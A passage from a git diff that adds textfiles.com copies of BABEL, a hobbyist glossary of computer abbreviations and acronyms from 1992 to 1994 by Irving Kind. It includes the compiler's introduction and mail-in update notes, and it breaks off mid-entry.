+RST Reset + Restart +RSTS Resource Sharing Time Sharing [Digital] +RSX Real Time Resource Sharing Executive +RT Real Time + RISC Technology + Run Time +RTAM Remote Terminal Access Method +RTC Real-Time Clock +RTL Register Transfer Language + + Resistor Transistor Logic + Run Time Library +RTM Response Time Monitor +RTOS Real-Time Operating System +RTS Request To Send +RTTY Radio Teletypewriter (Communications) +RTV Real Time Video +R/W Read/Write +RWM Read-Write Memory +RX Receiver +RXD Received Data +SAA Systems Application Architecture [IBM] +SAINT * Symbolic Automatic Integrator +SAL Shift Arithmetic Left +SAM Serial Access Memory + + Sequential Access Method +SAP Second Audio Program + Service Access Point [DEC] +SAP * Symbolic Assembly Program +SAR Shift Arithmetic Right + + Successive Approximation Register +SAS Sales Accounting System + Single Audio System +.SAV Saved (file name extension) +SBB Subtract With Borrow +SBC Single-Board Computer +SCAS Scan String +SCB Subsystem Control Block [IBM] +SCC Serial Communications Controllers + + Synchronous Channel Check [IBM] +SCD Standard Color Display +SCF System Control Facility +SCM Software Configuration Management +SCO Santa Cruz Operation (Software Company) +SCP Save Cursor Position + Subsystem Control Port + + System Control Program +SCR Silicon Controlled Rectifier +.SCR Script (file name extension) +SCRN Screen (video display) +SCSI Small Computer Systems Interface +SD Send Data +SDA Software Disk Array + Source Data Automation + + System Display Architecture [Digital] +.SDF Standard Data Format (file name extension) +SDLC Synchronous Data Link Control +SDK Software Developer's Kit [Microsoft] +SDN Software Defined Network [AT&T] +SDNS Secure Data Network Service +SDR Streaming Data Request +SDS Sysops Distribution System +SD_STB Streaming Data Strobe [IBM] +SEA Standard Extended Attribute [OS/2] +SEAC * Name of first computer to use transistors, built + by Standard Eastern Automating Computing +SEC Single Error Correction +SECAM Sequential Color And Memory +SED Stream Editor +SEG Segment +SEL Select +SEM Scanning Electron Microscope + + Standard Electronic Module +SER Serial +.SET Driver Set (file name extension) [Lotus 1-2-3] [LDC] + + Image Settings (file name extension) [Paradox] +SEU Smallest Executable Unit +SF Sign Flag +SFQL Structured Full-text Query Language +SFT System Fault Tolerance +SFX Sound Effect(s) +SGEN Signal Generator + System Generator +SGDT Store Global Descriptor Table +SGML Standard Generalized Markup Language +SGR Set Graphics Rendition +S/H Sample and Hold +SHL Shift Logical Left +SHR Shift Logical Right +SI Source Index + System Information +SID Station Identification [AT&T] +SIDT Store Interrupt Descriptor Table +SIG Special Interest Group +SIGCAT Special Interest Group on CD-ROM Applications + and Technology +SIM Simulator +SIMD Single Instruction Multiple Data Stream (processor) +SIMM Single In-line Memory Module +SIMULA Simulation (language) +SIP Single In-line Package +SIPO Serial In, Parallel Out +SIPP Single In-line Pin Package +SIT Special Information Tones +SISO Serial In, Serial Out +SLDT Store Local Descriptor Table +SLMR Silly Little Modem Reader +SLOSH Sea, Lake and Overland Surge from Hurricane (program) +SLSI Super Large-Scale Integration +SM Set Mode +SMB Server Message Block (protocol) [MII] +SMD Surface Mounted Device +SMDS Switched Multimegabit Data Service +SMI System Management Interrupts [Intel] +SMIF Standard Mechanical Interface +SMK Software Migration Kit [Microsoft] +SMP Symbolic Manipulation Program +SMPS Switching Mode Power Supply +SMSW Store Machine Status Word +SMT Surface-Mount Technology +SMTP Simple Mail Transfer Protocol +SMU System Management Utility +SN Serial Number +S/N Signal-to-Noise +SNA Systems Network Architecture [IBM] +SND Sound +SNMP Simple Network Management Protocol +SNOBOL String Oriented Symbolic Language (Progamming Language) +SNP Serial Number/Password [Omen Technology] +SNR Signal-to-Noise Ratio +SOE Standard Operating Environment +SOH Start of Heading +SOL Simulation Oriented Language +SOM Start of Message +SOP Standard Operating Procedures +SOS Silicon On Sapphire + Standards and Open Systems +SOTA State Of The Art +SP Stack Pointer + System Product +SPA Software Publishers Association +SPARC Scalable Processor Architecture +SPC Small Peripheral Controller + Statistical Process Control +SPCL Spectrum Cellular Corporation +SPF System Programming Facility +SPIKE Science Planning Intelligent Knowledge-Based + Environment [STScI] +SPL Spooler +.SPL Spell Checker (file name extension) +SPOOLING Simultaneous Peripheral Operations On Line +SPS Standby Power System +SPSS Statistical Package for the Social Sciences +SPT Sectors Per Track +SPX Sequenced Packet Exchange [Novell] +SQ Squeezed (files) +SQL Structured Query Language +SQRT Square Root +SR Shift Register +SRAM Shadow Random Access Memory + + Static Random Access Memory +SRO Sharable and Read Only +SRQ Service Request +SRR Serially Reusable Resource +SS Stack Segment + Single Sided + Seconds +SSEC * Selective Sequence Electronic Calculator [IBM] +SSGA System Suppport Gate Array +SSI Small Scale Integration +SST Spread-Spectrum Technology +STA Spanning Tree Algorithm +STB Strobe +STC Set Carry Flag +STD Set Direction Flag + Standard +STDA StreetTalk Directory Assistance [Banyan] +STDAUX Standard Auxillary +STDERR Standard Error +STDIN Standard Input +STDIO.H Standard Input/Output Header [C] +STDOUT Standard Output +STDPRN Standard Printer +.STF Structured File (file name extension) [Lotus Agenda] +STI Set Interrupt Flag +STN Supertwist Nematic +STOS Store String +STP Signal Transfer Point +STR Store Task Register + Synchronous Transmitter Receiver +STRESS Structural Engineering System Solver (Programming + Language) +STRUDL Structural Design Language (Programming Language) +STScI Space Telescope Science Institute +STX Start of Text +.STY Style (file name extension) [Ventura, Word, WordPerfect] +SUB Subroutine + Substitute + Subtract +.SUP Supplemental Dictionary (file name extension) + [WordPerfect] +S-VHS Super VHS +S/W Software +SYLK Symbolic Link +.SYN Synonym (file name extension) +SYNC Synchronous +SYS System +.SYS System Configuration (file name extension) + + System Device Driver (file name extension) +SYSGEN System Generator +SYSLOG System Log +SYSMOD System Modification +SYSOP System Operator +TAD Telephone Answering Device +TAPCIS The Access Program for the CompuServe + Information Service +TASM Turbo Assembler [Borland] +TAXI Transparent Asynchronous Tranceiver Interface +TB Terabyte (1,000 gigabytes) +T/B Top and Bottom +TBBS The Bread Board System (BBS) +.TBK Toolbook (file name extension) +TCM Trellis-Coded Modulation +TCP/IP Transmission Control Protocol/Internet Protocol +TD Transmit Data +TDE Terminal Display Editor +TDM Time Division Multiplexing +TDMS Terminal Display Management System +TDSR Transmitter Data Service Request +TDR Time Domain Reflectometry +TEC Tokyo Electronics Corporation +TED Tiny Editor +TEML Turbo Editor Macro Language [Borlund] +TERMPWR Terminator Power +TFEL Thin-Film Electroluminescent +TFT Thin-Film Transistor +.THD Thread (file name extension) +THOR Tandy High-Performance Optical Recording +.THS Thesaurus (file name extension) +TID Target ID +.TIF Tagged Image File (file name extension) +TIFF Tagged Image File Format +TIGA Texas Instruments Graphics Architecture +TIGER Topologically Integrated Geographic Encoding + and Referencing +TIP Terminal Interface Processor +TLB Translation Lookaside Buffer +TLU Table Lookup +.TLX Telex (file name extension) +TM Trademark +TMP Temporary +TN Twisted Nematic +TOP Technical and Office Protocol +TPC Transaction Processing Performance Council +TPI Tracks Per Inch +TPL Table Producing Language +TPORT Twisted Pair Port Transceiver [AT&T] +TPS Transaction Processing System +TR Terminal Ready +TRADIC * Transistorized Airborne Digital Computer + (Name of first computer to be entirely + transistorized) +TRON The Real-Time Operating System Nucleus +TS Top Secret +TSB Termination Status Block +TSO Time Sharing Option +TSR Terminate and Stay Resident +TSS Task State Segment + Time Sharing System +TS/SI Top Secret/Sensitive Information +.TST Printer Test (file name extension) [WordPerfect] +TSTN Triple Supertwisted Nematic +TTL Transistor-Transistor Logic +TTS Transaction Tracking System +TTY Teletype +TUI Text-Based User Interface [WordPerfect] +.TUT Tutorial (file name extension) +TVI Television Interference +TWX Teletypewriter Exchange Service +TXD Transmitted Data +TXT Text +TXT2STF Text To Structured File [Lotus Agenda] +UA User Agent + User Area +UAE Unrecoverable Application Error +UART Universal Asynchronous Receiver/Transmitter +UCL Universal Communications Language +UDP User Datagram Protocol [Novell] +UG User Group +UI Unix International +UID User Identifier +UL Upload +ULA Uncommitted Logic Array +ULSI Ultra Large Scale Integration +UMB Upper Memory Block [LIM/AST] +UNCOL Universal Computed Oriented Language +UNICOM Universal Integrated Communication (System) +UNICOS Universal Compiler FORTRAN compatible +UNIVAC Universal Automatic Computer +UNIX (AT&T Bell Laboratories Operating System) +UNMA Unified Network Management Architecture +UPC Universal Product Code +UPL User Program Language +UPM User Profile Management [IBM] +UPS Uninterruptible Power Supply + + Uninterruptible Power System +USART Universal Synchronous-Asynchronous Reciever/Transmitter +USERID User Identification +USQ Unsqueezed (files) +USRT Universal Synchronous Receiver/Transmitter +USSA User Supported Software Association (United Kingdom) +UT User Terminal +UTC Coordinated Universal Time +UTI Universal Text Interchange +UTP Unshielded Twisted-Pair +UUCP Unix-To-Unix Copy +UUI User-To-User Information [AT&T] +UV Ultraviolet +VA Virtual Address +VAD Value Added Dealer +VADD Value Added Disk Driver +VAL Value + Voice Application Language +.VAL Validity Checks (file name extension) [Paradox] +VAM Virtual Access Method +VAN Value Added Network +VAP Value Added Processes +VAR Value Added Reseller + Value Added Retailer + Variable +VAX Virtual Address Extension (Computer System + Designation) [DEC] +VB Variable Block +VCPI Virtual Control Program Interface +VCR Video Cassette Recorder +VDISK Virtual Disk +VDS Virtual DMA Services +VDT Video Display Terminal +VDU Video Display Unit + Visual Display Unit +VEGA Video-7 Enhanced Graphics Adapter [Video-7, Inc.] +VER Verify +VERR Verify Read Access +VERW Verify Write Access +VESA Video Electronics Standards Association +VFD Vacuum Fluorescent Display +VGA Video Graphics Array +VGC Video Graphics Controller +VHS Very High Speed + Virtual Host Storage +VHSIC Very High Speed Integrated Circuit +VIO Video Input/Output + Virtual Input/Output +VINES Virtual Network Operating System [Banyan] +VIP Variable Information Processing +VIPER Verifiable Integrated Processor for + Enhanced Reliability +VIS Voice Information System +VLF Very Low Frequency +VLIW Very Long Instruction Word (machine) +VLSI Very Large Scale Integration +VLSIPS Very Large Scale Immobilized Polymer Synthesis +VLT Variable List Table +VM Virtual Machine +VMM Virtual Memory Manager [Clipper] +VMOS Vertical MOS +VMS Virtual Memory System + Voice Message System +VMT Virtual Memory Technique +VOL Volume +VOM Volt Ohm Meter +VOS Verbal Operating System +VR Voltage Regulator +VRAM Video Random Access Memory +VROOMM Virtual Real-time Object Oriented + Memory Manager [Borlund] +.VRS WordPerfect Graphics Driver (file name extension) +VRU Voice Response Unit +VS Virtual Storage +VSAM Virtual Storage Access Method +VSAT Very Small Aperture Terminal +VSE Virtual Storage Extended +VSF Vertical Scanning Frequency +VSLI Very Large Scale Integration +VSM Virtual Storage Management +VSOS Virtual Storage Operating System +VSYNC Vertical Sync +VTAM Virtual Telecommunications Access Method [IBM] +VUI Video User Interface +VMS Virtual Memory System + Voice Message System +W/ With +WAITS Wide-Area Informtion Transfer System +WAN Wide Area Network +WATS Wide Area Telecommunications Service +WC Word Count +WELL Whole Earth Lectronic Link (BBS) +WGS Work Group System +.WKB Workbook (file name extension) [WordPerfect] +.WKE Worksheet (file name extension) [Lotus 1-2-3] [LDC] +.WKQ Spreadsheet (file name extension) [BORQU] +.WKS Worksheet (file name extension) [Lotus 1-2-3] [LDC] +.WKZ Compressed Spreadsheet (file name extension) [BORQU] +.WK1 Worksheet (file name extension) [Lotus 1-2-3] [LDC] +.WMF Windows Metafile (file name extension) [Microsoft] +WNIC Wide-Area Network Interface Co-Processor +WNIM Wide-Area Network Interface Module +W/O Without +WORM Write Once, Read Many +WP WordPerfect + Word Processing + Write Protected +.WPG Graphics (file name extension) [WordPerfect] +WPHD Write-Protect Hardd Disk +.WPK Keyboard (file name extension) [WordPerfect] +WPM Words Per Minute +.WPM Macro (file name extension) [WordPerfect] +.WQ1 Spreadsheet (file name extension) [BORPQU] +.WQ! Compressed Spreadsheet (file name extension) [BORPQU] +WS WordStar + Workstation +WT Write Through +WYSBYGI What You See Before You Get It +WYSIWYG What You See Is What You Get +XA Extended Architecture + Extended Attribute +XCHG Exchange +XCMD External Command +XDR External Data Representation +XFCN External Function +XGA Extended Graphics Array [IBM] +XID Exchange Identifier +XIOS Extended Input/Output System +XLAT Translate +XMIT Transmit +XMM Extended Memory Manager [LIM/AST] +XMS Extended Memory Specification [LIM/AST] +XNS Xerox Network System (protocol) +XOR Exclusive OR (Also EOR) +XSMD Extended Storage Module Drive (interface) +XTAL Crystal +XTCLK External Transmit Clock +YAM Yet Another Modem [Omen Technology] +ZBR Zone Bit Recording +Z-CAV Zoned Constant Angular Velocity +ZIP Zone Improvement Plan (ZIPcode) +.ZIP Compressed File (file name extension) [PKWare] +.ZOO Compressed File (file name extension) [Dhesi] +ZSL Zero Slot LAN +.$$$ Temporary File (file name extension) + UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU + UU UU + UU BABEL: A LISTING OF UU + UU COMPUTER ORIENTED ABBREVIATIONS AND ACRONYMS UU + UU UU + UUUUUUUUUUUUUUUUUUUU Version 92A UUUUUUUUUUUUUUUUUUUUU + +Copyright (c) 1989-1992 Irving Kind All Rights Reserved + c/o K & D, One Church Lane, Baltimore, MD 21208 + +Jan 1992 version = BABEL92A Jan 1993 version = BABEL93A +May 1992 version = BABEL92B May 1993 version = BABEL93B +Sep 1992 version = BABEL92C Sep 1993 version = BABEL93C + + +NOTE 1: (To insure that you will receive the latest version) + + On receipt of your disk and disk mailer stamped with return +postage, the following procedure is followed: + + If received during Jan, Feb or Mar; the Jan version will + be sent to you promptly. If received during Apr, your + disk will be held until the May version is issued. + + If received during May, Jun or Jul; the May version will + be sent to you promptly. If received during Aug, your + disk will be held until the Sep version is issued. + + If received during Sep, Oct or Nov; the Sep version will + be sent to you promptly. If received during Dec, your + disk will be held until the Jan version is issued. + + +NOTE 2: Any of these disk sizes may be sent for updates: + + 5-1/4" DD or HD 3-1/2" DD or HD + + + + \ No newline at end of file diff --git a/textfiles.com/computers/babel94a.txt b/textfiles.com/computers/babel94a.txt new file mode 100644 index 00000000..a5f34063 --- /dev/null +++ b/textfiles.com/computers/babel94a.txt @@ -0,0 +1,2597 @@ + UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU + UU UU + UU BABEL: A GLOSSARY OF UU + UU COMPUTER ORIENTED ABBREVIATIONS AND ACRONYMS UU + UU UU + UUUUUUUUUUUUUUUUUUUU Version 94A UUUUUUUUUUUUUUUUUUUUU + +Copyright (c) 1989-1994 Irving Kind All Rights Reserved + + + Compiled when I became frustrated while reading magazine +articles, help wanted ads and equipment for sale brochures....all +pertaining to computers....where the following Abbreviations and +Acronyms were used and their meanings were either not known to me +or were not immediately available. I have actually seen these +combinations of letters used at one time or another in magazines, +newspapers or handbooks. They apply to personal computers, +mainframes, communications, programming, networking, etc......you +name it. The glossary is free for anyone to use, but with no +guarantees as to its completeness. That is why I am now requesting +your help. Look over the definitions and let me have your +feedback. If you have ever seen letter combinations that you also +did not understand, please drop me a note at the address below. + + Also, if you find any errors, obsolete information or can +suggest any additions or deletions, they will be most welcome. If +you can help, my thanks in advance. + + In the meantime, print out a copy of this version and keep it +on your desk. I know you will find it useful. Updates to this +glossary will be issued three times a year; in January, May and +September. You may download the latest version of BABEL from your +favorite BBS or from The Internet. If any Bulletin Board SYSOP, +Club Librarian, Organization or Teacher sends me a formatted disk +with a disk mailer, stamped with return postage, I will return the +disk with the latest updated version of BABEL at no charge. See +APPENDIX A for additional information regarding updates. + + Letter groups followed with " * " were used before 1965. At +some of these, I have noted historical information. For a brief +interpretation of "smiley faces" and other informal expressions +used in electronic mail messages, see APPENDIX B. + + Some Bulletin Boards allow only six characters for a file name. +If you have downloaded as BAB94A.TXT, please rename to BABEL94A.TXT +before using. + + And please remember to ECAL. + + Irving Kind Internet: ikind@mcimail.com + c/o K & D MCI Mail: 545-3562 + One Church Lane + Baltimore, MD 21208 + +Jan 1994 version = BABEL94A Jan 1995 version = BABEL95A +May 1994 version = BABEL94B May 1995 version = BABEL95B +Sep 1994 version = BABEL94C Sep 1995 version = BABEL95C + + + + UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU + UU UU + UU BABEL: A GLOSSARY OF UU + UU COMPUTER ORIENTED ABBREVIATIONS AND ACRONYMS UU + UU UU + UUUUUUUUUUUUUUUUUUUU Version 94A UUUUUUUUUUUUUUUUUUUUU + +Copyright (c) 1989-1993 Irving Kind All Rights Reserved + + +AA Auto Answer +AAB All-to-All Broadcast +AAP Applications Access Point [DEC] +AAS All-to-All Scatter +AASP ASCII Asynchronous Support Package +AAT Average Access Time +ABC * Atanasoff-Berry Computer (First digital calculating + machine that used vacuum tubes) +ABEND Abnormal End +ABI Application Binary Interface +ABIOS Advanced BIOS +ABS Absolute +ABT Abort +AC Automatic Computer + Alternating Current +ACC Accumulator +ACD Automated Call Distribution +ACDI Asynchronous Communications Device Interface +ACE Advanced Computing Environment [SCO] + + Adverse Channel Enhancements [Microcom] + + * Automatic Computing Engine +ACF Access Control Field + Advanced Communications Function +ACH Automated Clearing House +ACIAS Automated Calibration Internal Analysis System +ACIS American Committee for Interoperable Systems +ACK Acknowledgment +ACL Access Control List +ACM Association for Computing Machinery +ACMS Application Control Management System +ACP Ancillary Control Program + Auxillary Control Process +ACROSS Automated Cargo Release and Operations Service System +ACS Access + Access Control Set + Access Control System + + Asynchronous Communication Server +ACU Automatic Calling Unit +A/D Analog to Digital +ADA Automatic Data Acquisitions + + (Programming Language named after Agusta Ada Lovelace) +ADC Adaptive Data Compression (protocol) [Hayes] + + Add with Carry + Analog to Digital Converter +ADCCP Advanced Data Communication Control Procedures +ADF Automatic Document Feed +.ADF Adapter Description File (file name extension) [IBM] +ADI AutoCad Device Interface (driver) +ADL Address Data Latch +ADLAT Adaptive Lattice Filter +ADMD Administrative Management Domain [X.400] +.ADN Add In Utility (file name extension) [Lotus 1-2-3] [LDC] +ADP Automatic Data Processing +ADPCM Adaptive Differential Pulse Code Modulation +ADR Address +ADS Application Development Solutions [AT&T] + + Application Development System + + Automatic Distribution System +ADSC Address Status Changed +ADSR Attack, Decay, Sustain, Release +ADT Application Data Types +ADU Automatic Dialing Unit +AE Above or Equal +AEB Analog Expansion Bus [Dialogic] +AF Auxilary carry Flag +AFC Automatic Font Change +AFD Automatic File Distribution +AFII Association for Font Information Interchange +.AFM Adobe Font Metrics (file name extension) [Adobe Systems] +AGC Automatic Gain Control +AI Analog Input + Artificial Intelligence +AIA Applications Integration Architecture [DEC] +AIF Audio Interchange Format +AIIM Association for Information and Image Management +AISB Association of Imaging Service Bureaus +AISP Association of Information Systems Professionals +AIX Advanced Interactive Executive [IBM] +ALC Arithmetic and Logic Circuits + Automatic Level Control +ALE Address Latch Enable +ALGOL Algorithmic Oriented Language (see IAL) +ALR Advanced Logic Research, Inc. +ALT Alternate (mode) +ALU Arithmetic Logic Unit +AMD Active Matrix Display + Advanced Micro Devices, Inc. +AMMA Advanced Memory Management Architecture [Everex Systems] +AMANDDA Automated Messaging and Directory Assistance +ANCOVA Analysis of Covariance +ANI Automatic Number Identification +ANOVA Analysis Of Variance +ANSI American National Standards Institute +AO Analog Output +AOE Application Operating Environment [AT&T] +AOL America Online +AOS Add Or Subtract +AP Adjunct Processor + Application Processor +A/P Accounts Payable +APA Adaptive Packet Assembly + + All Points Addressable + + Arithmetic Processing Accelerator +APAR Authorized Program Analysis Report [IBM] +APAREN Address Parity Enable [IBM] +APCUG Association of PC User Groups +API Application Program Interface + + Application Programming Interface +APL A Programming Language (Mathematics) +APM Advanced Power Management [IBM OS2] +.APP Application (file name extension) [R:Base] +APPC Advanced Program-to-Program + Communication (protocol) [IBM] +APPI Advanced Peer-to-Peer Internetworking +APPN Advanced Peer-to-Peer Networking [IBM] +APS Asynchronous Protocol Specification +APSE ADA Programming Support Environment +APT Address Pass Through + + Automatically Programmed Tools +A/R Accounts Receivable +ARA Apple Remote Access +.ARC Archive (file name extension) +ARCA Advanced RISC Computing Architecture +ARCnet Attached Resource Computer Network +ARL Adjusted Ring Length +ARLL Advanced Run Length Limited +ARM Asynchronous Response Mode +ARMA Association of Records Managers and Administrators +ARP Address Resolution Protocol [Novell] +ARPA Advanced Research Projects Agency +ARPL Adjust Requested Privilege Level +ARTIC A Real-Time Interface Copressor [IBM] +ARQ Automatic Repeat Request +ARU Audio Response Unit +ASAP As Soon As Possible + + Automatic Switching And Processing +AS3AP ANSI SQL Standard Scalable and Portable +.ASC ASCII text (file name extension) +ASCII American Standard Code for Information Interchange +ASIC Application-Specific Integrated Circuit +ASIT Advanced Security and Identification Technology +ASL Adaptive Speed Levelling +.ASM Assembler Source Language (file name extension) +ASP Association of Shareware Professionals +ASPI Advanced SCSI Programming Interface [Adaptec] +ASPS Advanced Signal Processing System +ASR Automatic Send-Receive + Automatic Speech Recognition +AST AST Research, Inc. (named from first initials of the + founders: Albert Wong, Safi Qureshey, Thomas Yuen) +ASYNC Asynchronous +AT Advanced Technology + Attention +ATA AT Bus Attachment +ATDP Attention Dial Pulse +ATDT Attention Dial Tone +ATE Automated Test Equipment +ATG Advanced Technology Group +ATH Attention Hang-Up +ATM Adobe Typeface Manager + Asynchronous Transfer Mode + + Automated Teller Machine +ATR Automatic Terminal Recognition +ATS Administrative Terminal System + + Apple Terminal Services +AT&T American Telephone and Telegraph +ATTN Attention +ATTRIB Attribute (also ATR) +AUDIT Automated Data Input Terminal +AUI Attached Unit Interface +AUP Appropriate Use Policies [Internet] +AUTO Automatic +AUX Auxiliary + (First Serial Port) +AVA Audio Visual Authoring [IBM] +AVC Audio Visual Connection [IBM] +AVG Average +AVI Audio Visual Interleaved [Microsoft] +AWG American Wire Gage +AWS Advanced Workstations and Systems (group) [IBM] +AX Architecture Extended + Automatic Transmission +BAK Binary Adaption Kit [Microsoft] +.BAK Backup (file name extension) +BAL Basic Assembly Language +BAM Boyan Action Module +BARTS Bell Atlantic Regional Timesharing +.BAS Basic Language (file name extension) +BASIC Beginner's All-purpose Symbolic Instruction Code +BASM Built-In Assembler +.BAT Batch Processing (file name extension) +BBS Bulletin Board System +BCC Block Check Character +BCD Binary Coded Decimal +BCL Batch Command Language +BCP Bulk Copy Program +BCPL Basic Computer Programming Language +BCR Byte Count Register +BDOS Basic Disk Operating System +BE Below or Equal +BEL Bell +BELLCORE Bell Communications Research +BERT Bit Error Rate Test/Tester +BF Bad Flag +B/F Background/Foreground +BFT Binary File Transfer +BGE Branch if Greater or Equal +.BGI Borland Graphic Interface (file name extension) +BGT Branch if Greater Than +BHI Branch if Higher +BHIS Branch if Higher or Same +BI Binary Input +.BIB Bibliography (file name extension) +BiDi Bidirectional +BIM Beginning of Information Marker +.BIN Binary (file name extension) +BINAC * Binary Automatic Computer +BIOS Basic Input/Output System +BIS Business Information System +BiSYNC (See BSYNC) +BIT Binary Digit +BITNET Because It's Time Network +BIU Bus Interface Unit +BIX Byte Information Exchange (BBS) +.BK! Backup (file name extension) [WordPerfect] +BKSP Backspace +BL Backlit +BLAST Blocked Asynchronous Transmission (protocol) + [Communications Research Group] +.BLD BASIC Bload Graphics (file name extension) +BLE Branch if Less or Equal +BLK Block +BLMC Buried Logic Macrocell +BLOB Binary Large Object +BLOS Branch if Lower Or Same +BMI Branch if Minus +BMIC BusMaster Interface Controller [Intel] +BMP Batch Message Processing Program +.BMP Bitmap Graphics (file name extension) [Windows] [OS/2] +BNE Branch if Not Equal +BO Binary Output +BoB Break-out Box +BOM Beginning Of Message +BOOTP Bootstrap Protocol [Internet] +BORPQU Borland Pro Quattro +BORQU Borland Quattro +BOS Basic Operating System +BOT Beginning Of Table + Beginning of Tape +BP Base Pointer +BPB BIOS Parameter Block +BPI Bits Per Inch +BPL Branch if Plus +BPS Bits Per Second + Bytes Per Second +BR Bad Register +BRGC Binary Reflected Gray Code +BRI Basic Rate Interface + Brain Response Interface +BSAM Basic Sequential Access Method +BSC Binary Synchronous Communication +.BSC Boyan Script (file name extension) [Boyan Communications] +BSCS Bachelor of Science (Degree) in Computer Science +BSD Berkely Standard Distribution +BSF Bit Scan Forward +BSI British Standards Institute +BSR Bit Scan Reverse +BSV BASIC Bsave Graphics (file name extension) +BSY Busy +BSYNC Binary Synchronous Communications (protocol) +BT Bit Test +BTAM Basic Telecommunications Access Method [IBM] +BTB Branch Target Buffer +BTC Bit Test and Complement +BTP Batch Transfer Program +BTR Bit Test and Reset +BTS Bit Test and Set +BUF Buffer +BWM Block-Write Mode +B2X Binary To Hexadecimal [REXX] +BYTE Binary Element String +C C Programming Language +.C C source code (file name extension) [C] +CA Collision Avoidance +CAD Computer Aided Design +CADD Computer Aided Design and Drafting +CAE Common Applications Environment + + Computer Aided Engineering +CAG Column Address Generator +CAI Computer Aided Instruction +CAL Calendar + Computer Aided Learning +CAM Common Access Method + Computer Aided Manufacturing + + Contents Addressable Memory +CAN Cancel +CAP Central Arbitration Point + + Communication Application Platform + + Computer Aided Publishing +CAPD Computing To Assist Persons With Disabilities [Johns + Hopkins University] +CAPS Capitals (Upper Case Letters) + + Cassette Programming System +CAS Column Address Select + + Communications Application Specification + + Computer Aided Styling +CASE Computer Aided Software Engineering +CASL Crosstalk Application Scripting Language [DCA] +CASS Computer Assisted Search Service +CASSIS Classified and Search Support Information System +CAT Computer Aided Testing + Computer Aided Tomography + + Computer Aided Transcription + Concatenate +.CAT Catalog (file name extension) +CATS Computer Assisted Training System +CATV Community Antenna Television +CAV Constant Angular Velocity +CBCR Channel Byte Count Register +CBEMA Computer and Business Equipment + Manufacturers Association +CBL Computer Based Learning +.CBL COBOL source code (file name extension) +CBT Computer Based Training +CBW Convert Byte to Word +CBX Computer-Controlled Branch Exchange +CC Cluster Controller +CCD Charged-Coupled Device +CCFT Cold Cathode Fluorescent Tube +CCITT Consultative Committee for International + Telegraph and Telephone +CCP Console Command Processor +CCS Common Communications Support + + Continuous Composite Servo +CD Carrier Detect + Change Directory + + Collision Detection + Color Display + Compact Disk +C/D Control Data +C2D Character To Decimal [REXX] +CDA Compound Document Architecture [DEC] +CDC Control Data Corporation +CD_CHRDY Card Channel Ready [IBM] +CDDI Copper Distributed Data Interface +CDE Complex Data Entry +.CDF Comma Delimited Format (file name extension) +CD-I Compact Disk - Interactive +CD-MO Compact Disk - Magneto Optical +CDOS Concurrent Disk Operating System +CDL Computer Design Language +CDMA Code Division Multiple Access +CDPD Cellular Digital Packet Data +CD-RDx Compact Disk - Read Only Memory Data Exchange Standard +CD-ROM Compact Disk - Read Only Memory +CDR Call Detail Record + Call Detail Recording +CD-R Compact Disk - Recordable +CDRL Contract Data Requirements List +CD-RTOS Compact Disk - Real Time Operating System +CDS Current Directory Structure +CD-V Compact Disk - Video +CD-WO Compact Disk - Write Once +.CDX Compound Index (file name extension) [Fox Pro] +CD-XA Compact Disk - Extended Architecture +CE Cache Enable + Chip Enable + Collision Elimination + + Convert Enable +CEG Continuous Edge Graphics +CEI Conducted Electromagnetic Interference +CERT Computer Emergency Response Team +.CFG Configuration (file name extension) +CFV Call For Votes [Bitnet] +CGA Color Graphics Adapter +CGI Computer Generated Images + + Computer Graphics Interface +.CGM Computer Graphics Metafile (file name extension) + + Graph (file name extension) [Lotus 1-2-3] [LDC] +CHAP Challenge Authentication Protocol (protocol) +CHAR Character +CHCK Channel Check +CHCP Change Code Page [OS/2] +CHGRP Change Group +.CHK CHKDSK (file name extension) +CHKDSK Check Disk +CHMOD Change Mode +CHOWN Change Owner +CHP Chapter +CHR Character +CICS/VS Customer Information Control System/ + Virtual Storage [IBM] +CID Configuration/Installation/Distribution +CIM CompuServe Information Manager + + Computer Integrated Manufacturing +CIOCS Communication Input/Output Control System +CIP Command Interface Port +CIRC Circular Reference +CIS CompuServe Information Service + + Computer Information Systems +CISC Complex Instruction Set Computing +CIX Commercial Internet Exchange + + Compulink Information Exchange +CKD Count Key Data (device) +CLAR Channel Local Address Register +CLASS Cooperative Library Agency for Systems + and Services +CLC Clear Carry Flag +CLD Clear Direction Flag +CLI Call-Level Interface + Clear Interrupt Flag + + Command Line Interface +CLIST Command List +CLK Clock +CLNP Connectionless Network Protocol +.CLP Clipboard (file name extension) [Windows] +CLS Clear Screen +CLTS Clear Task Switch Flag +CLV Constant Linear Velocity +CM Centimeter + Control Mark + Corrective Maintenance +CMA Concert Multi-thread Architecture +CMC Communication Mangement Configuration + + Complement Carry Flag +.CMD Command (file name extension) +CMIP Common Management Information Protocol +CMIS Common Management Information System +CML Current Mode Logic +CMMU Cache/Memory Management Unit [Motorola] +CMOS Complementary Metal-Oxide Semiconductor +CMP Compare + Computer +CMPS Compare word String +CMS Code Management System + Compiler Monitor System + + Conversation Monitor System +CMY Cyan-Magenta-Yellow (color model) +CMYK Cyan-Magenta-Yellow-Black (color model) +CNC Computerized Numerical Control +.CNF Configuration (file name extension) +CNG Calling (tone) +CNSS Core Nodal Switching Subsystem [Internet] +CNV Conventional (pertaining to Memory) +CNVT Convert +CO Central Office + Command Output + Convert Out +.COB COBAL source code (file name extension) +COBOL Common Business-oriented Language (See HLL) +.COD Code List (file name extension) +CODASYL * Conference on Data System Languages (Group that + designed COBOL) +CODEC Compression/Decompression +COEM Commercial Original Equipment Manufacturer +COGO Coordinate Geometry (Programming Language) +COL Collision + Computer Oriented Language +COM Commercial (organization Domain name) [Internet] +.COM Command (file name extension) + +COM1 First serial Port (asynchronous port) +COM2 Second serial Port +COM3 Third serial Port +COM4 Fourth serial Port +COMDEX Computer Dealers Exposition +COMP Compare + Communications +COMSAT Communications Satellite Corporation +CON Console (includes Keyboard and Screen) +CONFIG Configuration +CONTONE Continuous Tone +CORBA Common Object Request Broker Architecture +CoREN Corporation for Research and Enterprise Network +COS Compatible Operating System +COSE Common Open Software Environment +COSMOS Computer System for Mainframe Operations +CP Copy Protected +CPA Certified Public Accountant +CPCS Check Processing Control System [IBM] +CPE Central Processing Element + + Customer Premise Equipment + + Customer Provided Equipment +CPG Clock Pulse Generator +CPI Characters Per Inch + Clock Per Instruction + + Common Programming Interface [IBM] +.CPI Code Page 